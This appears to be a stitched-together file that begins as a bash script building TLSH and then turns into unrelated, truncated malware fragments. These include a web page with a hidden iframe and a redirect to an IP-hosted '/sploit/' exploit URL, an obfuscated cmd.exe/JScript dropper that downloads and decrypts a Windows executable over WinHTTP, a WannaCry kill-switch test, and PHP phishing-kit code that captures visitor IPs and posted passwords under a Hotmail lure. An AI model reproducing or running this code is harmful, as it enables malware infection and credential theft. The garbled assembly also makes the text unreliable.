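#!/usr/bin/env bash
# Fetch and build TLSH v3.4.5 from the upstream GitHub release archive.
# Requires: sudo rights for apt-get, plus curl and unzip on PATH.
# Intended to be run as a script, not pasted into an interactive shell.
#
# Abort on the first failed step or unset variable, so a failed or partial
# download is never unpacked and built.
set -eu

sudo apt-get install cmake

# -f makes curl exit non-zero on an HTTP error instead of saving the error
# page as v3.4.5.zip; -L follows redirects to the archive download.
curl -fL -O https://github.com/trendmicro/tlsh/archive/v3.4.5.zip

# NOTE(review): the archive is unpacked and built without an integrity check.
# Pin the digest of a copy you have verified and compare before unpacking, e.g.
#   echo "<EXPECTED_SHA256>  v3.4.5.zip" | sha256sum -c -
unzip v3.4.5.zip

# With set -e a failed cd stops the script, so make.sh never runs from the
# wrong directory.
cd tlsh-3.4.5/
bash make.sh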
<HEAD> | |
</HEAD> | |
<BODY BGCOLOR="WHITE"> | |
<CENTER> | |
<iframe width="0" scrolling="no" height="0" frameborder="0" src="" seamless="seamless"> | |
<H1>A Simple Sample Web Page</H1> | |
If you would like to make a link or bookmark to this page, the URL is:<BR> http://sheldonbrown.com/web_sample1.html |
$("body").remove();$("html").append("body").html("<div style=\"\"></div>");window.location.href = "http://194.58.38.103/sploit/flow3.php" |
cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=0x24;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+"."+e+"Request.5.1");y.setProxy(n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,S="etofile",a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinH"+"TTP",j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v["charCo"+"deAt"](027+v[M]("PE\x00\x00"));s.WriteText |
/*
A simple test to check the behavior of WannaCry's Kill Switch
functionality. Compile with Visual Studio.
@brad_anton
Example Run:
Set DNS to 208.67.222.222
C:\Users\user\Desktop\WannaCryTest\Debug>WannaCryTest.exe
GOOD: WannaCry would have been aborted!
GET / HTTP/1.1 | |
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | |
Cache-Control: no-cache |
import httplib2 | |
import os | |
import base64 | |
import email | |
import re | |
from apiclient import errors | |
from apiclient import discovery | |
from oauth2client import client | |
from oauth2client import tools |
<?php | |
$ip = getenv("REMOTE_ADDR"); | |
//Get IP Country City | |
$url = "http://api.ipinfodb.com/v3/ip-country/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip"; | |
$url = "http://api.ipinfodb.com/v3/ip-city/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip"; | |
$ipCountryCityInfo = file_get_contents($url); | |
// |
An example client library can be found in client.py. To use:
>>> from client import ektracker_client
>>> e = ektracker_client('your_api_key')
>>> e.add_tag('rig', 'rig exploit kit', [ 'http://www.google.com/', 'http://www.test.com' ], ['.*', '[a-f]{1,}'])
Uploading Tag: {'signatures': ['.*', '[a-f]{1,}'], 'references': ['http://www.google.com/', 'http://www.test.com'], 'name': 'rig', 'description': 'rig exploit kit'}
<?php | |
session_start(); | |
$country = visitor_country(); | |
$ip = $_SERVER['REMOTE_ADDR']; | |
$login = $_SESSION['clientemail']; | |
$passwd = $_POST['passwd']; | |
$sender = 'Hotmail-3D@serverX.com'; | |
$over = 'https://outlook.live.com/owa/?path=/mail/inbox'; |